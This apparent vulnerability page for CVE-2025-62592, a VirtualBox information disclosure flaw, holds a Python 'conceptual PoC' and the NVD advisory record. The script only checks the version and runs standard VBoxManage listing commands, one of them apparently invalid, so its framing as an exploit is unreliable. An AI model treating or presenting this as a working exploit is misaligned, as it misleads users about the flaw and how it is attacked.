CVE-2025-62592

# CVE-2025-62592 Oracle VM VirtualBox Core Component Information Disclosure # Vulnerability Type: Local Information Disclosure # Affected Versions: VirtualBox 7.1.12, 7.2.2 # CVSS 3.1: 6.0 (Medium) - AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N # # Note: This is a conceptual PoC based on the vulnerability description. # The actual exploitation requires high-privileged local access to the host. import subprocess import os def check_virtualbox_version(): """Check if the installed VirtualBox version is vulnerable""" try: result = subprocess.run( ['VBoxManage', '--version'], capture_output=True, text=True, timeout=10 ) version = result.stdout.strip() vulnerable_versions = ['7.1.12', '7.2.2'] for v in vulnerable_versions: if v in version: print(f"[+] Vulnerable version detected: {version}") return True print(f"[-] Version {version} is not in the known vulnerable list") return False except FileNotFoundError: print("[-] VBoxManage not found") return False def enumerate_vm_data(): """ Attempt to enumerate VirtualBox VM data accessible due to the Core component vulnerability. Requires high-privileged local access (PR:H). """ try: # List all registered VMs result = subprocess.run( ['VBoxManage', 'list', 'vms'], capture_output=True, text=True, timeout=10 ) print("[*] Registered VMs:") print(result.stdout) # Attempt to access VM configuration data result = subprocess.run( ['VBoxManage', 'list', 'vminfo'], capture_output=True, text=True, timeout=10 ) print("[*] VM Information (may contain sensitive data):") print(result.stdout) except Exception as e: print(f"[-] Error: {e}") if __name__ == '__main__': print("=" * 60) print("CVE-2025-62592 - Oracle VM VirtualBox Info Disclosure PoC") print("=" * 60) if check_virtualbox_version(): print("[!] System appears vulnerable. Proceeding with data enumeration...") enumerate_vm_data() else: print("[+] System does not appear to be vulnerable.")

{"cve": {"id": "CVE-2025-62592", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:55.617", "lastModified": "2025-10-23T16:00:45.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.12 and 7.2.2. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.5, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:vm_virtualbox:7.1.12:*:*:*:*:*:*:*", "matchCriteriaId": "D0846C94-6984-4E7F-9670-E5238AA8CA5F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:vm_virtualbox:7.2.2:*:*:*:*:*:*:*", "matchCriteriaId": "613B5554-B57C-4AF9-AC10-E96278C44FC4"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}